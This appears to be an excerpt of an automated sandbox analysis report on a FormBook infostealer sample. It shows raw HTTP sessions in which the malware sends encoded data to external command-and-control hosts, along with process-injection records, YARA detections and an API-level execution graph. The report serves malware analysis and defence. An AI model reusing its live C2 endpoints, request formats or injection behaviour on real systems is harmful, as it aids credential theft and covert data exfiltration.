                                              Data Raw: 6b 30 36 54 3d 36 6e 4a 46 42 55 6e 39 4e 65 33 4f 33 46 4d 31 35 55 75 50 36 30 5a 63 6c 68 59 64 50 4d 51 50 45 54 65 71 65 38 5a 59 5a 69 6d 52 54 78 67 76 37 37 68 32 76 34 31 39 6a 51 4a 73 66 55 55 6e 6b 6f 66 56 2f 31 63 68 41 79 73 65 67 47 70 61 6f 62 77 68 4f 49 7a 56 6c 45 42 38 35 72 53 4f 51 67 54 77 5a 56 68 35 68 34 41 39 6a 52 39 45 68 64 30 2f 74 44 6e 52 6e 45 4e 4f 69 52 45 34 78 77 73 5a 53 70 42 49 51 7a 41 36 42 6d 68 58 43 59 4d 6a 46 69 47 50 38 31 70 54 51 74 31 43 70 42 79 4d 50 61 79 39 78 48 71 2f 54 54 69 57 79 6a 65 79 49 37 6b 6c 4a 2f 76 42 55 76 6a 75 63 7a 76 59 36 41 62 5a 75 5a 36 72 58 4b 51 66 46 70 46 63 4f 65 57 4e 6b 74 70 6f 44 53 79 54 36 35 56 74 33 36 50 53 71 6f 6c 54 53 4d 49 76 41 45 56 50 63 47 2f 4f 6a 73 2f 31 6c 43 62 64 41 4d 44 47 31 75 36 32 79 65 4b 50 35 4f 2b 4b 4b 52 70 2f 62 4c 42 75 42 64 79 61 72 52 52 72 71 6b 64 4a 66 72 34 38 6c 42 73 36 68 45 43 4c 41 30 56 72 36 76 2b 7a 51 61 7a 30 70 54 69 74 5a 54 64 69 63 78 41 79 69 46 61 56 78 [TRUNCATED]
                                              Data Ascii: k06T=6nJFBUn9Ne3O3FM15UuP60ZclhYdPMQPETeqe8ZYZimRTxgv77h2v419jQJsfUUnkofV/1chAysegGpaobwhOIzVlEB85rSOQgTwZVh5h4A9jR9Ehd0/tDnRnENOiRE4xwsZSpBIQzA6BmhXCYMjFiGP81pTQt1CpByMPay9xHq/TTiWyjeyI7klJ/vBUvjuczvY6AbZuZ6rXKQfFpFcOeWNktpoDSyT65Vt36PSqolTSMIvAEVPcG/Ojs/1lCbdAMDG1u62yeKP5O+KKRp/bLBuBdyarRRrqkdJfr48lBs6hECLA0Vr6v+zQaz0pTitZTdicxAyiFaVxPv/T12QB7MK3ZTWRyM01clXqlQ9pHnsxxBv9DNDVfh0cfbnDk+57NNKEA4AXpeljY1AsRHeGsqWZuvytNPaCmOz7UUPe2WHlJkIzy7Zqq4ym0qPE9OCuaqoM3FeHS0zt4DpVG7ZJ7Q66ITHaqWk1dI/5oVu4CzKgx16gqaB4ZTrNh569GHhuH4UQDF9D5gUFm/AToq0ijwIKSadZADmEg9u/+5LFB+/gUr0b0hDhSIC+3kvL8lHGAZq54bmhGDSqCjCWe0iJi4HpES2dE7y3ExiiSczSRBzqr2V6z5QUxPbjFQVYjGm0BaX01x7kJc4ddg06rSex3rimIxVA1c3cMal136gpMhMadSl03YzgjelNtI2LJoiT8eCslKOzBRqgMmXbiD4rLJbKLkQxm+Dm0g4ENEVuhifuqeTUa+gvlKcyvLh10W+0RqVSv24aw0t9Gsvg7FFApkiNr2KzMicE/io/9TyQYZQIYaxK8XX2hpI6i9AqhiNPOE/LX/clt3Wy7ywrmlHUKttKTdu1ibjwORLOONzS9sU0sUccQ3qk8dm8lqnPjKBSQ8180u9Zym8XW+7AU17inLkzICtGpR3rOxlSYtWn+5vr9/XOlCKfso5mvfXiYm9JoB9kTZnIp9y1jZl0Tl0orANdAYuOUWUlOdPB4lRv/YGjEt [TRUNCATED]
                                              Jul 3, 2024 16:41:46.698823929 CEST176INHTTP/1.1 405 Method Not Allowed
                                              Server: nginx/1.20.2
                                              Date: Wed, 03 Jul 2024 14:41:46 GMT
                                              Content-Type: text/html
                                              Content-Length: 157
                                              Via: 1.1 google
                                              Connection: close
                                              Jul 3, 2024 16:41:46.702044010 CEST157INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              24192.168.2.54973735.241.34.216805784C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 3, 2024 16:41:48.696413040 CEST542OUTGET /7npk/?rz=LZsl-bkp-XfXeRLp&k06T=3lhlChS8FYnXqyMl6DrMwk16pFUOD90SHj/DecBTIjGSaQxy34ZC87B+/wA+Ty9En/TQ2WIUU2NJwAlG0p0MOprHpEJhuLS8Xg3IfDdoqaVi1Ch1kdwH1TvR7mgJgyRVyQ== HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.mg55aa.xyz
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                              Jul 3, 2024 16:41:49.340217113 CEST300INHTTP/1.1 200 OK
                                              Server: nginx/1.20.2
                                              Date: Wed, 03 Jul 2024 14:41:49 GMT
                                              Content-Type: text/html
                                              Content-Length: 5161
                                              Last-Modified: Mon, 15 Jan 2024 02:08:28 GMT
                                              Vary: Accept-Encoding
                                              ETag: "65a4939c-1429"
                                              Cache-Control: no-cache
                                              Accept-Ranges: bytes
                                              Via: 1.1 google
                                              Connection: close
                                              Jul 3, 2024 16:41:49.355428934 CEST1236INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63
                                              Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true
                                              Jul 3, 2024 16:41:49.355463982 CEST1236INData Raw: 77 20 49 6d 61 67 65 29 2e 73 72 63 3d 6e 7d 66 75 6e 63 74 69 6f 6e 20 72 65 70 6f 72 74 4c 6f 61 64 69 6e 67 28 6e 29 7b 6e 3d 6e 7c 7c 7b 7d 3b 76 61 72 20 6f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 6e 3d 28 77 69 6e 64 6f
                                              Data Ascii: w Image).src=n}function reportLoading(n){n=n||{};var o=function(){for(var n=(window.location.search.substr(1)||"").split("&"),o={},e=0;e<n.length;e++){var r=n[e].split("=");o[r[0]]=r[1]}return function(){return o}}();function e(){var n=window.
                                              Jul 3, 2024 16:41:49.355475903 CEST1236INData Raw: 74 72 3d 64 73 66 72 70 66 76 65 64 6e 63 70 73 73 6e 74 6e 77 62 69 70 72 65 69 6d 65 75 74 73 76 22 29 3b 28 65 28 29 7c 7c 72 28 29 29 26 26 22 61 6e 64 72 6f 69 64 22 3d 3d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 77 69 6e 64 6f
                                              Data Ascii: tr=dsfrpfvedncpssntnwbipreimeutsv");(e()||r())&&"android"===function(){var n=window.navigator.userAgent.toLowerCase();return window.ucweb?"android":n.match(/ios/i)||n.match(/ipad/i)||n.match(/iphone/i)?"iphone":n.match(/android/i)||n.match(/ap
                                              Jul 3, 2024 16:41:49.355667114 CEST1236INData Raw: 28 22 73 72 63 22 2c 22 2f 2f 69 6d 61 67 65 2e 75 63 2e 63 6e 2f 73 2f 75 61 65 2f 67 2f 30 31 2f 77 65 6c 66 61 72 65 61 67 65 6e 63 79 2f 76 63 6f 6e 73 6f 6c 65 2e 6d 69 6e 2d 33 2e 33 2e 30 2e 6a 73 22 29 2c 24 68 65 61 64 2e 69 6e 73 65 72
                                              Data Ascii: ("src","//image.uc.cn/s/uae/g/01/welfareagency/vconsole.min-3.3.0.js"),$head.insertBefore($script1,$head.lastChild),$script1.onload=function(){var e=document.createElement("script");e.setAttribute("crossorigin","anonymous"),e.setAttribute("src
                                              Jul 3, 2024 16:41:49.355676889 CEST217INData Raw: e6 b2 a1 e6 9c 89 e5 b9 bf e5 91 8a 3c 2f 64 69 76 3e 3c 64 69 76 3e e7 94 b5 e5 bd b1 e6 92 ad e6 94 be e4 b8 8d e5 8d a1 e9 a1 bf 3c 2f 64 69 76 3e 3c 64 69 76 3e e7 b2 be e5 bd a9 e8 a7 86 e9 a2 91 e5 ad 98 e5 85 a5 e7 bd 91 e7 9b 98 e9 9a 8f
                                              Data Ascii: </div><div></div><div></div></div><script src="https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js"></script></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              25192.168.2.54973874.208.46.171805784C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 3, 2024 16:41:54.409286022 CEST817OUTPOST /i1fz/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate, br
                                              Host: www.lavillitadepapa.com
                                              Origin: http://www.lavillitadepapa.com
                                              Referer: http://www.lavillitadepapa.com/i1fz/
                                              Content-Length: 205
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                              Data Raw: 6b 30 36 54 3d 33 2f 57 62 31 4b 6d 6b 64 57 68 41 5a 49 52 32 74 4f 6b 6d 62 53 55 68 52 63 66 54 63 33 61 66 41 32 61 43 69 5a 58 4c 57 32 43 52 6b 49 32 6c 45 31 42 36 2f 53 62 2b 7a 41 41 52 53 50 37 67 54 74 66 38 4e 55 6e 69 67 4e 39 55 7a 7a 48 4d 6b 68 69 50 34 47 2f 62 70 37 62 32 6b 39 6a 75 4f 30 4c 69 46 33 47 44 53 30 48 77 4f 48 50 50 33 69 5a 31 46 66 33 7a 74 6f 57 4a 77 63 2f 70 70 61 37 30 4e 39 48 71 53 68 42 51 57 46 2f 48 43 30 53 55 47 4b 65 52 2b 52 64 6f 74 69 76 49 41 43 55 49 6e 5a 31 48 70 33 77 62 47 4d 49 70 4f 2b 7a 33 70 5a 56 6c 55 53 44 57 68 4c 33 74 79 36 47 7a 6a 45 4d 3d
                                              Data Ascii: k06T=3/Wb1KmkdWhAZIR2tOkmbSUhRcfTc3afA2aCiZXLW2CRkI2lE1B6/Sb+zAARSP7gTtf8NUnigN9UzzHMkhiP4G/bp7b2k9juO0LiF3GDS0HwOHPP3iZ1Ff3ztoWJwc/ppa70N9HqShBQWF/HC0SUGKeR+RdotivIACUInZ1Hp3wbGMIpO+z3pZVlUSDWhL3ty6GzjEM=
                                              Jul 3, 2024 16:41:54.940505028 CEST466INHTTP/1.1 301 Moved Permanently
                                              Date: Wed, 03 Jul 2024 14:41:54 GMT
                                              Server: Apache
                                              Location: https://www.lavillitadepapa.com/i1fz/
                                              Content-Length: 245
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 61 76 69 6c 6c 69 74 61 64 65 70 61 70 61 2e 63 6f 6d 2f 69 31 66 7a 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.lavillitadepapa.com/i1fz/">here</a>.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              26192.168.2.54973974.208.46.171805784C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 3, 2024 16:41:56.950323105 CEST837OUTPOST /i1fz/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate, br
                                              Host: www.lavillitadepapa.com
                                              Origin: http://www.lavillitadepapa.com
                                              Referer: http://www.lavillitadepapa.com/i1fz/
                                              Content-Length: 225
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                              Data Raw: 6b 30 36 54 3d 33 2f 57 62 31 4b 6d 6b 64 57 68 41 57 49 42 32 76 74 38 6d 54 53 55 6d 64 38 66 54 54 58 61 62 41 32 57 43 69 59 69 4d 57 6a 61 52 6b 6f 6d 6c 44 30 42 36 34 53 62 2b 39 67 41 59 66 76 37 70 54 74 54 46 4e 56 62 69 67 4e 70 55 7a 33 50 4d 6b 53 61 49 34 57 2b 39 6b 62 62 34 67 39 6a 75 4f 30 4c 69 46 32 69 6c 53 30 76 77 4f 58 54 50 32 44 5a 32 44 76 33 38 39 59 57 4a 36 38 2f 74 70 61 37 64 4e 38 62 41 53 6c 78 51 57 46 50 48 43 6c 53 4c 49 4b 65 62 77 78 64 38 38 41 75 66 42 42 55 6e 36 71 41 55 31 6c 38 39 4b 61 6c 44 55 63 37 66 36 35 35 64 45 42 4c 68 77 37 57 45 6f 5a 57 44 39 54 59 39 66 41 47 6b 48 72 75 75 77 59 48 31 6d 7a 52 51 4e 74 54 63
                                              Data Ascii: k06T=3/Wb1KmkdWhAWIB2vt8mTSUmd8fTTXabA2WCiYiMWjaRkomlD0B64Sb+9gAYfv7pTtTFNVbigNpUz3PMkSaI4W+9kbb4g9juO0LiF2ilS0vwOXTP2DZ2Dv389YWJ68/tpa7dN8bASlxQWFPHClSLIKebwxd88AufBBUn6qAU1l89KalDUc7f655dEBLhw7WEoZWD9TY9fAGkHruuwYH1mzRQNtTc
                                              Jul 3, 2024 16:41:57.469104052 CEST466INHTTP/1.1 301 Moved Permanently
                                              Date: Wed, 03 Jul 2024 14:41:57 GMT
                                              Server: Apache
                                              Location: https://www.lavillitadepapa.com/i1fz/
                                              Content-Length: 245
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 61 76 69 6c 6c 69 74 61 64 65 70 61 70 61 2e 63 6f 6d 2f 69 31 66 7a 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.lavillitadepapa.com/i1fz/">here</a>.</p></body></html>


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:10:38:50
                                              Start date:03/07/2024
                                              Path:C:\Users\user\Desktop\GJRX21GBj3.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\Desktop\GJRX21GBj3.exe"
                                              Imagebase:0x7ff658550000
                                              File size:1'951'744 bytes
                                              MD5 hash:804CC1B2769F38027FD2C2BF8141013B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:1
                                              Start time:10:38:50
                                              Start date:03/07/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6d64d0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:3
                                              Start time:10:38:51
                                              Start date:03/07/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):
                                              Commandline:"C:\Windows\System32\svchost.exe"
                                              Imagebase:
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              General

                                              Target ID:4
                                              Start time:10:38:51
                                              Start date:03/07/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"
                                              Imagebase:0xd80000
                                              File size:144'344 bytes
                                              MD5 hash:417D6EA61C097F8DF6FEF2A57F9692DF
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2294296870.0000000005BA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2294296870.0000000005BA0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2293698389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2293698389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2294356055.0000000005CE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2294356055.0000000005CE0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                              Reputation:moderate
                                              Has exited:true

                                              General

                                              Target ID:6
                                              Start time:10:39:05
                                              Start date:03/07/2024
                                              Path:C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe"
                                              Imagebase:0xdf0000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3925057114.0000000002AF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3925057114.0000000002AF0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high
                                              Has exited:false

                                              General

                                              Target ID:7
                                              Start time:10:39:07
                                              Start date:03/07/2024
                                              Path:C:\Windows\SysWOW64\findstr.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\SysWOW64\findstr.exe"
                                              Imagebase:0x190000
                                              File size:29'696 bytes
                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3924270486.0000000003150000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3924270486.0000000003150000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3924150933.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3924150933.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              Reputation:moderate
                                              Has exited:false

                                              General

                                              Target ID:8
                                              Start time:10:39:20
                                              Start date:03/07/2024
                                              Path:C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe"
                                              Imagebase:0xdf0000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3925169217.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3925169217.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high
                                              Has exited:false

                                              General

                                              Target ID:11
                                              Start time:10:39:36
                                              Start date:03/07/2024
                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                              Imagebase:0x7ff79f9e0000
                                              File size:676'768 bytes
                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:5.9%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:25.6%
                                                Total number of Nodes:924
                                                Total number of Limit Nodes:25
                                                execution_graph 15289 7ff65856e9fa 15290 7ff65856ea09 15289->15290 15292 7ff65856ea67 15290->15292 15293 7ff658587820 15290->15293 15294 7ff658587960 15293->15294 15302 7ff658587860 15293->15302 15308 7ff6585b0c20 15294->15308 15297 7ff6585878ce EnterCriticalSection 15297->15302 15298 7ff65858790f LeaveCriticalSection 15305 7ff6585629e0 15298->15305 15299 7ff658587a0b LeaveCriticalSection 15299->15294 15299->15302 15301 7ff6585879ea EnterCriticalSection 15301->15299 15302->15294 15302->15297 15302->15298 15302->15299 15302->15301 15304 7ff658587a4e EnterCriticalSection LeaveCriticalSection 15302->15304 15317 7ff658562a70 VirtualFree 15302->15317 15304->15302 15306 7ff6585629fb VirtualAlloc 15305->15306 15307 7ff658562a1e GetCurrentProcess VirtualAllocExNuma 15305->15307 15306->15302 15307->15302 15309 7ff6585b0c29 15308->15309 15310 7ff6585879cd 15309->15310 15311 7ff6585b0ed0 IsProcessorFeaturePresent 15309->15311 15310->15292 15312 7ff6585b0ee8 15311->15312 15318 7ff6585b10c8 RtlCaptureContext 15312->15318 15317->15302 15319 7ff6585b10e2 RtlLookupFunctionEntry 15318->15319 15320 7ff6585b0efb 15319->15320 15321 7ff6585b10f8 RtlVirtualUnwind 15319->15321 15322 7ff6585b0e9c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 15320->15322 15321->15319 15321->15320 15323 7ff6586026c0 15336 7ff658553200 15323->15336 15325 7ff6586026e0 15352 7ff658553a10 15325->15352 15329 7ff658602706 15364 7ff658554390 15329->15364 15331 7ff658602718 15332 7ff658602739 15331->15332 15371 7ff658602a10 15331->15371 15375 7ff6585f4c50 15332->15375 15335 7ff658602746 15337 7ff65855325e 15336->15337 15338 7ff65855322f 15336->15338 15337->15325 15338->15337 15339 7ff6585532ef 15338->15339 15346 7ff6585532b7 15338->15346 15347 7ff658553298 15338->15347 15350 7ff6585532d6 15338->15350 15340 7ff6585532f6 15339->15340 15341 7ff65855330f 15339->15341 15389 7ff65855ce20 15340->15389 15343 7ff658553335 15341->15343 15392 7ff6585530c0 GetLastError 15341->15392 15343->15325 15345 7ff658553302 RaiseFailFastException 15345->15341 15346->15350 15351 7ff6585532c9 RaiseFailFastException 15346->15351 15349 7ff6585532a0 Sleep 15347->15349 15349->15346 15349->15349 15383 7ff658557580 15350->15383 15351->15350 15398 7ff6585b0c40 15352->15398 15355 7ff658602860 15363 7ff65860289c 15355->15363 15356 7ff658602986 15362 7ff658602993 15356->15362 15428 7ff658603980 15356->15428 15359 7ff658602977 15360 7ff658554390 26 API calls 15359->15360 15360->15356 15362->15329 15363->15356 15363->15359 15423 7ff6585539a0 15363->15423 15365 7ff658554399 15364->15365 15366 7ff6585547e0 26 API calls 15365->15366 15367 7ff6585543de 15365->15367 15368 7ff6585f5990 15366->15368 15367->15331 15369 7ff6585f5b20 26 API calls 15368->15369 15370 7ff6585f5a53 15369->15370 15372 7ff658602a38 15371->15372 15374 7ff658602a68 15372->15374 15578 7ff658602c20 15372->15578 15374->15331 15377 7ff6585f4c5a 15375->15377 15376 7ff6585f4c5f 15376->15335 15377->15376 15378 7ff6585547e0 26 API calls 15377->15378 15379 7ff6585f4c84 15378->15379 15380 7ff6585f4c9f 15379->15380 15381 7ff6585547e0 26 API calls 15379->15381 15380->15335 15382 7ff6585f4cc4 15381->15382 15384 7ff6585575a6 15383->15384 15388 7ff6585575c4 15384->15388 15395 7ff65855c8a0 FlsGetValue 15384->15395 15386 7ff6585575bc 15387 7ff6585526b0 6 API calls 15386->15387 15387->15388 15388->15339 15390 7ff65855ce34 15389->15390 15390->15390 15391 7ff65855ce3d GetStdHandle WriteFile 15390->15391 15391->15345 15393 7ff6585530e4 